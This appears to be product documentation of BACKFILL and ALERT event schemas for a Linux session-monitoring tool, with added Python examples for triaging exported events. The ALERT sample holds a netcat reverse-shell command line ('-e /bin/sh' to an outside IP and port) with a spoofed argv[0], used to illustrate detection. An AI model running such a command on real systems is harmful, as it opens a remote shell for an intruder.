E.g.: [{"name": "env var name", "value": "env var value"}]

BACKFILL event data schema

Backfill events are sent, if required, to fill in gaps in process ancestry. They do not represent an execve() system call as EXEC events do, but have similar fields and are intended to approximate EXECs. The information in the event is gathered from sources including /proc.

Properties that appear once per BACKFILL event

Field name Description
version String. The version number of the event type’s data structure (e.g. Backfill 1.0.0). Major version changes (e.g. 1.0.0 to 2.0.0) reflect updates that may require significant changes to your data processing pipelines. Minor version number changes refer to backwards-compatible changes such as adding fields.
event_type String. Value is always “BACKFILL”. These JSON objects represent Backfill events.
server_uuid String. UUID of the server that emitted the event.
project_id String. ID of the project that emitted the event.
company_id String. ID of the company that emitted the event.
event_uuid String. UUID of the event itself.
process_uuid String. UUID of the process that emitted the event.
session_uuid String. UUID of the session that emitted the event.
parent_uuid String. UUID of the parent of the process that emitted the event.
group_uuid String. UUID of the process group for the process that emitted the event.
inception_session_uuid String. UUID of the inception session for the process that emitted this event.
E.g. e3b24ade-8b84-546f-b969-d95dca2641b8
last_known_uec_parent_uuid String. UUID of the last known UEC parent of the process that emitted this event.
E.g. e3b24ade-8b84-546f-b969-d95dca2641b8
interactive_session Boolean. Whether the session is interactive (has a controlling terminal).
interactive_process Boolean. Whether the self process’ stdin and stderr are bound to the controlling terminal. In Cmd Control agents prior to v1.4.0, true when the process was launched from bash and bash considered itself to be interactive as per the bash man page.
session_leader Boolean. Whether the self process is a session leader. A session leader is the process that initially created the session, and its SID is the same as its PID. See “man credentials” to learn more.
user_typed Boolean. Whether the event was the result of a user-typed command. (In other words, whether the self process matches the LKUEP criteria.)
boot_id String. Unique identifier for the currently booted Linux OS. It is newly generated at every reboot. Originates from /proc/sys/kernel/random/boot_id.
pid_ns_ino String. Inode number of the PID namespace from which the process was observed (the number the kernel exposes via /proc/[pid]/ns/pid). See “man 7 namespaces” for additional details.
inception_estimated_start_time String. Estimated time when the inception session began.
inception_entry_mechanism String. Entry mechanism used in the inception session. This helps determine how the user connected. Current values are UNKNOWN, SSH, INIT, TTY, CONSOLE, AWS_SSM and OTHER. For Cmd Control agents prior to 1.4.0 values are SSH, TTY and UNKNOWN.
inception_source_ip String. The IP address that initiated the SSH session responsible for this event.
cmd_user String. Name of the Cmd user associated with the process, if they performed 2FA during this session (prior to the event).
cmd_roles List of strings. Any Cmd roles associated with the user’s Cmd account.
inception_session_env_vars List of strings. The environment variables that were recorded at the beginning of the session.
inception_session_city String. City associated with the source IP of the inception SSH session, if available. (A private IP will not show a city).
E.g. Boulder
inception_session_country String. Country associated with the inception SSH session’s source IP address, if available.
E.g. United States
inception_session_ip_risk Float. Risk rating of the inception SSH session’s source IP address, according to MaxMind. 0.01 to 99. A higher score indicates a higher risk of fraud.
E.g. 87
inception_session_ip_latitude Float. WGS84 latitude associated with the inception SSH session’s source IP address, if available. Values range from -90.0000 to 90.0000.
E.g. 49.1239
inception_session_ip_longitude Float. WGS84 longitude associated with the inception SSH session’s source IP address, if available. Values range from -180.0000 to 180.0000.
E.g. -123.1938
inception_session_region String. Region (state or province) associated with the inception SSH session’s source IP address, if available.
E.g. Colorado
server_groups List of strings. Any server groups you have associated with this agent install using its config.ini or the Cmd web app.
E.g. web-server, production
inception_server_hostname String. Hostname associated with the Linux server, VM, or container where the agent is deployed.
E.g. webapp1-e9381
server_name String. Name assigned to the server in the config.ini or in the Cmd web app.
E.g. webapp1
server_ips List of strings. IP addresses associated with the server, VM, or container where the agent is deployed.
E.g. 192.168.22.3
thread_id (Cmd Audit only). Integer. The Linux thread ID of the thread in which the event occurred. This, along with cpu_id, can help disambiguate events of the same type that occur in rapid succession, when event_time may not be granular enough.
cpu_id (Cmd Audit only). Integer. Identifies the CPU core on which this event was observed.
cri_namespace String. The process' Kubernetes namespace.
E.g. default
cri_pod_name String. The process' Kubernetes pod name.
E.g. cmd-nginx
cri_node_name String. The process' Kubernetes node name.
E.g. node-1234
cri_container_id String. The process' runtime container ID, i.e. the CRI-O or containerd container ID.
E.g. 0c4e3b80c0b3fb798b4163dbc489ed739e67435bdfd83545c7fc45c0419c135c
cri_container_image String. The process' container image hash (digest).
E.g. sha256:bd0ad0dd8520627a4478298cd74fead558b7819167a5b40d09ea6aaee9c92153
cri_container_name String. The process' container name.
E.g. nginx

Properties that appear multiple times per BACKFILL event

The following properties are present five times in each event, once for each process the event describes: self; parent; session; inception_session; and last_known_uec_parent. For example, the field described here as *_exe appears in each exported event as self_exe, parent_exe, session_exe, inception_session_exe, and last_known_uec_parent_exe.

Field name Description
*_exe String. Absolute file path to the command.
*_user String. Username associated with the effective user ID (EUID) Note: for containerized workloads from an outer PID namespace, this value may be incorrect or missing because the /etc/passwd with the correct username resides within the container image.
*_pid Integer. The process’ PID. See “man credentials” for additional details.
*_ppid Integer. The process’ PPID. See “man credentials” for additional details.
*_sid Integer. The process’ SID. Identifies a collection of processes for job control purposes. Equals the PID of the session leader. See “man credentials” for additional details.
*_pgid Integer. PGID of the process. Identifies a collection of processes for job control (signalling) purposes. Equal to the PID of the process group leader. See “man credentials” for additional details.
*_suid Integer. The process’ saved user ID (SUID). Allows a process to elevate and drop privileges as a user. See “man credentials” for additional details.
*_sgid Integer. The process’ saved group ID (SGID). Allows a process to elevate and drop privileges as a group. See “man credentials” for additional details.
*_ruid Integer. The process’ real user ID (RUID). Identifies the user who owns the process. See “man credentials” for additional details.
*_rgid Integer. The process’ real group ID (RGID). The RGID identifies the group that owns the process. See “man credentials” for additional details.
*_euid Integer. The process’ effective user ID (EUID). Determines permissions for accessing shared resources and files as a user. See “man credentials” for additional details.
*_egid Integer. The process’ effective group ID (EGID). Determines permissions for accessing shared resources and files as a group. See “man credentials” for additional details.
*_ctty_minor Integer. Minor device number of the process’ controlling terminal. Uniquely identifies a particular device within a general class.
*_ctty_major Integer. Major device number of the process’ controlling terminal. The major number identifies the general class of device, and is used by the kernel to find the appropriate driver.
*_stdin_minor Integer. Minor device number of the process’ standard input.
*_stdin_major Integer. Major device number of the process’ standard input.
*_stdout_minor Integer. Minor device number of the process’ standard output.
*_stdout_major Integer. Major device number of the process’ standard output.
*_stderr_minor Integer. Minor device number of the process’ standard error.
*_stderr_major Integer. Major device number of the process’ standard error.
*_start_time_ticks String. Start time of the process in clock ticks since system boot. See “starttime” under /proc/[pid]/stat in “man proc” for additional details. The value is exported as a string because it is a uint64, and JSON consumers written in JavaScript store numbers as IEEE-754 doubles, which cannot represent integers above 2^53 exactly. Because PIDs are reused, combine this value with boot_id and the PID when you need to identify a process unambiguously across an export.
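As an added example (not part of the Cmd documentation or product), the following Python reads a constructed two-event NDJSON export and shows how a consumer would check the schema version, ignore unknown fields, recompute "interactive process" from the *_ctty and *_stdin/*_stdout/*_stderr device numbers, compare self_euid with the inception session's RUID to see who really started a process regardless of sudo or su, and convert *_start_time_ticks from its string form. The sample events, their device numbers, users and UUIDs are made up; treating EUID 0 reached from a non-root entry as "escalated" is my own choice, not a Cmd field.

```python
"""Triage helpers for Cmd NDJSON exports (BACKFILL and EXEC events).

Added example, not Cmd's own tooling. The two events below are
constructed to match the field names in this schema; users, device
numbers and UUIDs are made up for illustration.
"""
import json

SUPPORTED_MAJOR = 1  # the "Backfill 1.x.y" schema described on this page

# Constructed sample export: a process in an SSH session where alice
# reached root via sudo, and a service process with no controlling
# terminal whose stdio is /dev/null (major 1, minor 3).
SAMPLE_NDJSON = "\n".join(json.dumps(ev) for ev in [
    {
        "version": "Backfill 1.2.0", "event_type": "BACKFILL",
        "inception_session_uuid": "e3b24ade-8b84-546f-b969-d95dca2641b8",
        "inception_entry_mechanism": "SSH", "interactive_session": True,
        "self_exe": "/usr/bin/cat", "self_user": "root",
        "self_ruid": 0, "self_euid": 0,
        "self_ctty_major": 136, "self_ctty_minor": 3,
        "self_stdin_major": 136, "self_stdin_minor": 3,
        "self_stdout_major": 136, "self_stdout_minor": 3,
        "self_stderr_major": 136, "self_stderr_minor": 3,
        "self_start_time_ticks": "18446744073709551615",
        "inception_session_exe": "/bin/bash", "inception_session_user": "alice",
        "inception_session_ruid": 1001, "inception_session_euid": 1001,
        "some_future_field": "must be ignored",  # schema may add fields
    },
    {
        "version": "Backfill 1.2.0", "event_type": "BACKFILL",
        "inception_session_uuid": "5fee9bd6-63bd-5895-a954-7d92bbe5ed30",
        "inception_entry_mechanism": "INIT", "interactive_session": False,
        "self_exe": "/usr/sbin/nginx", "self_user": "www-data",
        "self_ruid": 33, "self_euid": 33,
        "self_ctty_major": 0, "self_ctty_minor": 0,
        "self_stdin_major": 1, "self_stdin_minor": 3,
        "self_stdout_major": 1, "self_stdout_minor": 3,
        "self_stderr_major": 1, "self_stderr_minor": 3,
        "self_start_time_ticks": "4242",
        "inception_session_exe": "/sbin/init", "inception_session_user": "root",
        "inception_session_ruid": 0, "inception_session_euid": 0,
    },
])


def parse_version(version):
    """'Backfill 1.2.0' -> ('Backfill', 1, 2, 0)."""
    kind, _, number = version.rpartition(" ")
    major, minor, patch = (int(part) for part in number.split("."))
    return kind, major, minor, patch


def schema_compatible(version):
    """Only a major-version bump can break a consumer; minor bumps add fields."""
    return parse_version(version)[1] == SUPPORTED_MAJOR


def iter_events(ndjson_text):
    """Yield one dict per non-empty line, refusing incompatible schema versions."""
    for line in ndjson_text.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        if not schema_compatible(event["version"]):
            raise ValueError("unsupported schema version: " + event["version"])
        yield event


def device(event, prefix, stream):
    """(major, minor) of e.g. self_stdin; (0, 0) means no device."""
    return event[f"{prefix}_{stream}_major"], event[f"{prefix}_{stream}_minor"]


def tied_to_ctty(event, prefix="self"):
    """Recompute 'interactive process' from the raw device numbers: stdin,
    stdout and stderr all refer to the process' controlling terminal."""
    ctty = device(event, prefix, "ctty")
    if ctty == (0, 0):
        return False
    return all(device(event, prefix, s) == ctty for s in ("stdin", "stdout", "stderr"))


def privilege_change(event):
    """(entry_user, effective_user) when the process EUID differs from the
    RUID of the inception session (sudo/su, or a service dropping privileges)."""
    if event["self_euid"] != event["inception_session_ruid"]:
        return event["inception_session_user"], event["self_user"]
    return None


def start_ticks(event, prefix="self"):
    """*_start_time_ticks is a string because JavaScript numbers are IEEE-754
    doubles and lose precision above 2**53; Python ints are exact."""
    return int(event[f"{prefix}_start_time_ticks"])


def triage(ndjson_text):
    """One summary row per event with the fields a responder looks at first."""
    return [{
        "exe": ev["self_exe"],
        "entry": ev["inception_entry_mechanism"],
        "interactive": tied_to_ctty(ev),
        "priv_change": privilege_change(ev),
        # assumption: root reached from a non-root entry counts as escalation
        "escalated": ev["self_euid"] == 0 and ev["inception_session_ruid"] != 0,
        "start_ticks": start_ticks(ev),
    } for ev in iter_events(ndjson_text)]
```

Note that privilege_change also reports a service that dropped privileges after being started by init (root to www-data in the second sample), so filter on escalated or on inception_entry_mechanism when hunting for sudo/su use by people.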

ALERT event data schema

Alert events occur when triggers fire. Each Alert event includes the following fields:

Field name Description
version String. The version number of the event type’s data structure (e.g. Alert 1.0.0). Major version changes (e.g. 1.0.0 to 2.0.0) reflect updates that may require significant changes to your data processing pipelines. Minor version number changes refer to backwards-compatible changes such as adding fields.
event_type String. Value is “ALERT”. These JSON objects represent alert events.
server_uuid String. UUID of the server that emitted the event.
project_id String. ID of the project that emitted the event.
company_id String. ID of the company that emitted the event.
inception_session_ip_risk Float. Risk rating (0.01 to 99) of the inception SSH session’s source IP address, according to MaxMind. Higher scores indicate higher risk.
inception_source_ip String. The IP address that initiated the SSH session responsible for this alert.
server_hostname String. Hostname associated with the Linux server, VM, or container where the agent is deployed.
E.g. webapp1-e9381
server_name String. Name assigned to the server in the config.ini or in the Cmd web app.
E.g. webapp1
server_ips List of strings. IP addresses associated with the server, VM, or container where the alert took place.
E.g. ["127.0.0.1","203.0.113.24"]
alert_type String. The type of trigger that caused the alert. Either Exec, Builtin, Session, File, or AuthFailure.
alert_uuid String. UUID of the alert that was resolved.
E.g. 2e00fcf2-8b6c-11eb-8c7c-0242ac110002
alert_level Integer. Alert level defined in the fired trigger (0-5).
alert_time String. Time when the alert that this event resolved occurred, in UTC.
Formatted as: YYYY-MM-DDTHH:mm:ss.SSSSSSSSSZ
trigger_uuid String. E.g. c98516d0-8b4c-11eb-9f0b-7fab23aff4a4
trigger_group_uuid String. E.g. 4e3c3833-8b32-11eb-9048-0242ac110002
trigger_type String. Values include “generic” (command trigger), “session” (session trigger), and “file” (file trigger).
trigger_name String. Name of the fired trigger.
trigger_description String. Description of the fired trigger.
trigger_query String. Query used in the fired trigger.
trigger_actions Array of objects. The actions associated with the trigger that created the alert, in the format: [ { "action": ..., "value": ... } ]. Note that value is itself a JSON document serialised as a string, so consumers must JSON-decode it a second time.
E.g. [ { "action": "send_slack", "value": "{\"integration_id\": \"dfa12de583734352a11ee7121bf3b645\"}" } ]
event_uuid String. UUID of the event that caused the alert that was resolved (command triggers only).
E.g. 4e3c3833-8b32-11eb-9048-0242ac110002
process_uuid String. UUID of the process that caused the trigger to fire.
E.g. 4e3c3833-8b32-11eb-9048-0242ac110002
inception_session_uuid String. UUID of the inception session that caused the alert.
E.g. 5fee9bd6-63bd-5895-a954-7d92bbe5ed30
interactive_session Boolean. True when the session that caused the alert was interactive.
interactive_process Boolean. True when the process that caused the alert was interactive (command triggers only).
user_typed Boolean. True when the command that caused the alert was deemed to have been typed by a user (command triggers only).
inception_session_start_time String. Time when the alert’s inception session began, in UTC.
Formatted as: YYYY-MM-DDTHH:mm:ss.SSSSSSSSSZ
cmd_user String. Name of the Cmd user that caused the alert, if they performed 2FA during this session (prior to the alert).
cmd_roles List of strings. Any Cmd roles associated with the user’s Cmd account.
inception_session_user String. Name of the Linux user that created the inception session.
inception_entry_mechanism String. Entry mechanism used in the inception session. Can help determine how the user connected. Current values are UNKNOWN, SSH, INIT, TTY, CONSOLE, AWS_SSM and OTHER. For Cmd Control agents prior to 1.4.0 values are SSH, TTY and UNKNOWN.
args Array of strings. The command line arguments used when invoking the program, as passed to the entry point of the executable. The first item in the array is typically, but not always, the base name of the executable as per /proc/[pid]/cmdline: a caller can set argv[0] to anything, so use self_exe when you need the real binary. (Command triggers only).
cwd String. The working directory of the process when the command was run.
self_exe String. The executable path of the command that caused the alert (command triggers only).
self_user String. The user who executed the command that caused the alert (command triggers only).
event_time String. Time when the event that caused the alert occurred, in UTC.
Formatted as: YYYY-MM-DDTHH:mm:ss.SSSSSSSSSZ.
ancestor_exe Array of strings. For command triggers only, the executable paths on the way up the process tree from the event that caused the alert to the beginning of the session.
E.g. [".", "tmux"]
filename String. The name of the file that caused a file alert to happen. (File triggers only).
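As an added example (not part of the Cmd documentation or product), here is a small Python consumer for ALERT events that handles the points above that trip people up: trigger_actions[].value is a JSON string inside the JSON object and must be decoded twice, args[0] is under the caller's control and should be compared with self_exe, and ancestor_exe is ordered from the alerting process up to the session start. The alert below is constructed from the field list on this page; its UUIDs, trigger name, query, integration id and the 50-point risk threshold are made up.

```python
"""Consumer for Cmd ALERT export events (added example, not Cmd code).

The alert below is constructed from the field list in this schema; its
UUIDs, trigger name, query and Slack integration id are made up.
"""
import json
import os

SAMPLE_ALERT = json.dumps({
    "version": "Alert 1.0.0", "event_type": "ALERT",
    "alert_type": "Exec", "alert_level": 4,
    "alert_uuid": "2e00fcf2-8b6c-11eb-8c7c-0242ac110002",
    "trigger_type": "generic", "trigger_name": "netcat-with-exec",
    "trigger_query": "self_exe:/usr/bin/nc",
    "trigger_actions": [
        {"action": "send_slack",
         "value": "{\"integration_id\": \"dfa12de583734352a11ee7121bf3b645\"}"},
        {"action": "block", "value": ""},
    ],
    "inception_session_ip_risk": 87.0,
    "inception_source_ip": "203.0.113.9",
    "inception_entry_mechanism": "SSH",
    "inception_session_user": "alice",
    "user_typed": True,
    # argv[0] disguised as a kernel thread; self_exe is what the kernel ran
    "args": ["[kworker/0:1]", "-e", "/bin/sh", "203.0.113.10", "4444"],
    "cwd": "/tmp",
    "self_exe": "/usr/bin/nc", "self_user": "alice",
    "ancestor_exe": ["/bin/bash", "/usr/bin/tmux"],
})

RISK_THRESHOLD = 50.0  # assumption for this example, not a Cmd setting


def decode_actions(alert):
    """trigger_actions[].value is a JSON document serialised inside the JSON
    string, so decode it a second time. Empty or non-JSON values are kept as-is."""
    decoded = []
    for action in alert.get("trigger_actions", []):
        value = action.get("value", "")
        try:
            value = json.loads(value) if value else value
        except ValueError:
            pass  # plain string value, leave untouched
        decoded.append({"action": action.get("action"), "value": value})
    return decoded


def argv0_mismatch(alert):
    """True when argv[0] does not match the basename of self_exe. Attackers
    set argv[0] (e.g. `exec -a`) to hide in ps output; self_exe comes from the
    kernel. Multicall binaries (busybox) and symlinks also differ legitimately,
    so treat this as a hint, not a verdict."""
    args = alert.get("args") or []
    exe = alert.get("self_exe")
    if not args or not exe:
        return False
    return os.path.basename(args[0]) != os.path.basename(exe)


def process_chain(alert):
    """ancestor_exe runs from the alerting process up to the session start;
    reverse it to read root-to-leaf, then append the alerting executable."""
    chain = list(reversed(alert.get("ancestor_exe", []))) + [alert["self_exe"]]
    return " > ".join(chain)


def summarize(alert_json):
    """Flatten one exported ALERT line into the fields a responder wants."""
    alert = json.loads(alert_json)
    slack_ids = [a["value"]["integration_id"] for a in decode_actions(alert)
                 if a["action"] == "send_slack" and isinstance(a["value"], dict)]
    return {
        "level": alert["alert_level"],
        "trigger": alert["trigger_name"],
        "chain": process_chain(alert),
        "argv0_spoofed": argv0_mismatch(alert),
        "cmdline": " ".join(alert.get("args", [])),
        "high_risk_ip": alert.get("inception_session_ip_risk", 0.0) >= RISK_THRESHOLD,
        "slack_integrations": slack_ids,
    }
```

Because alert events may be emitted by older agents with fewer fields, every accessor above uses .get() with a default for the optional, command-trigger-only fields and only indexes directly into fields the schema lists as always present.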